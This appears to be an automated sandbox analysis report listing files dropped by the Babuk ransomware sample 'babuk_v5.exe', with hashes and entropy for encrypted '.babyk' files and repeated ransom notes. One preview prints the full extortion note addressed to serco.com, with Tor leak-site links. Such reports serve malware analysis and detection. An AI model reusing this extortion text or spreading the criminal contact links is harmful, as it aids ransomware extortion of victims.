                                                                            SSDEEP:3:tlK9TU3fuBHJeBXZwniFLDqIoD6VdWZ/BbLnj8Aq2LztOubK/mJZGUB8LUxNvEEn:aIWBHJeFOncLDqIo2VQnj8ANLpsmJ4+D
                                                                            MD5:E57F0B86AECC1DC3502D149F50364982
                                                                            SHA1:730397A0842B0EA9CFF4021362961B5FD36FAB86
                                                                            SHA-256:23656A88C33E8646D9D7151B6639B5F054D4060E4AA9D650800CF5DE23C6F245
                                                                            SHA-512:B290BC20567698C602F318F41FBC76141831A29046621BC68698DFD76B156400D4B2E26EA9C8B3A1DDBCC9511DC2107ACFA3E3EF40F8DF6692518B5DCE236A6D
                                                                            Malicious:false
                                                                            Preview: ....c..M.,..7k.:....W..bH 79z......TH........N....s.e..A.o..].@.].sM.s.....^....G.h..N...{S..'.P....5..e.I.....y...".}.._\qZC.<c........choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.978268348387075
                                                                            Encrypted:false
                                                                            SSDEEP:192:UrwpCWy/mWPHYHgihYTZIrsg6M235ty3J145cu8btmbs34pKWVJ:Us0b/lqNAZ4sxM235tCM5cjbtH3uVJ
                                                                            MD5:520077DFBD83B6981B2FAB046FED002D
                                                                            SHA1:D6E2CAE9F84095C8C11A16562BEA1EB5D33336DB
                                                                            SHA-256:8164C27E83F40541B304479D0E1B75CCB46CE86452F87F7F28A8A6C640E2F3ED
                                                                            SHA-512:454CA04A06D421514AD2AD5684A7913EF79DF1B5DAD41895BBD5AAC31FDAD0C2FA6E26F30FFBA5CE545513238A122EAB40C9F64FBE375D5A1208CA750253960E
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                             Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                             Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                             Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                             Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                             Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                             Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                             Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                             Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                             Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.491471774409048
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlmogxnAdotCb19l1DERJ5tMWtDeAoLQVov6a5Ylv/PbmuJwbcNLUxNvEEn:OFFCb1HYMWtjo16a58/jmCwbcNL0vtn
                                                                            MD5:EBE819FD8C674E9A6ED9677A87A93E68
                                                                            SHA1:8FCF389887F00D39A84082B66CE456ADE40A7DFC
                                                                            SHA-256:8A775611C374B9D062434CDA79BDD9556802F94099A071FEF7247F73883E2837
                                                                            SHA-512:0770F4EED04386E76332D1D6FDDED5D15F52001DBF101FC32F10757111EBB2E4648ECFAEA2D327864DE9A9A76CE12D43FF360FA4657145F275403ECCE1C6DBDB
                                                                            Malicious:false
                                                                            Preview: ....H??.N.T{...Y..7oe..h.-~d..A.Q'>.......@.......Oz.t. \H........a..J...u...l...TV. %q..e....(s..^*m...te...T...o,p;.....m......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.976794139227306
                                                                            Encrypted:false
                                                                            SSDEEP:192:MLZedcAohKe9Jn8fyXbrgmhupz43IW+5H6sboH:MLZeKAMKeIyfgmhupzgI/oH
                                                                            MD5:9FC006A552AFA1D641FC0A3993515C93
                                                                            SHA1:645C1E4349E7557C0C7236AFC71D40ECD1D33C64
                                                                            SHA-256:07052D9142F56D37C945EA012E2754C8568676EE3EA60B84E054428F5B524F1E
                                                                            SHA-512:555DE566EC4B131C5F06EF217A06D9E82BB719EC718719A02FC620444B369E6B07FC8C66D1EC3A25E0865A40B4CEC7C1629A3FD43F409C5317FE9EB9985617E5
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.533503881484169
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlAjx5wMxa5RdyRMjKfOpXRNnEJj8CLgliCQzF5im7UK0QmUxNvEEn:wjvYbyq2fOpLnEtTLgliCQzF5r7UK0BI
                                                                            MD5:29B7B6693439B610630D369C46E9C304
                                                                            SHA1:D3009E274BF094381469FB0B0F7199730E91E9FC
                                                                            SHA-256:2990DFFBF3F179A2E1FAE13CAB23C6B176A8673A8AAC30285C31CB6CCA4DDE2F
                                                                            SHA-512:37CD5B251580362D93A14191B1A6A65E231B5B8B33AA338CF5622D84ED089F585CBA005F7CD66B7AE833D946E593EF71EFD8F2EAB4457F6E31E568977A76929B
                                                                            Malicious:false
                                                                            Preview: .....C.FT.\...$"......r...#.i....4....NE../....|.........[.l..g.)...J.DF.O...o.../0....f...^.F....;...lC.$......`z..-...[V.h....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.977978526119467
                                                                            Encrypted:false
                                                                            SSDEEP:192:qPeHRY7qb3XG78ZTfP0IVPjtuimvPQKQJNYhQnKf:q2xY7qb3XS8B9VPpuLI7JNrKf
                                                                            MD5:7C5B6C77AB6541D50CE393E78DF543AE
                                                                            SHA1:45A16EDFC9CD32693026ECDB1A5D8B15DBD9F2E7
                                                                            SHA-256:224D4BDC8A394AE71C1F00584DBE5BAE0B5E1233C6339F386613629CBD79A0AE
                                                                            SHA-512:F4AE24038B52A9496ECFF73F9A1C23677301A8C679896E023D3412DC0A76C44480CCE0C483BFDA8D4BE95FEB9E07B94F2F9A77DEB50B9F05A21CE224C4743CCB
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
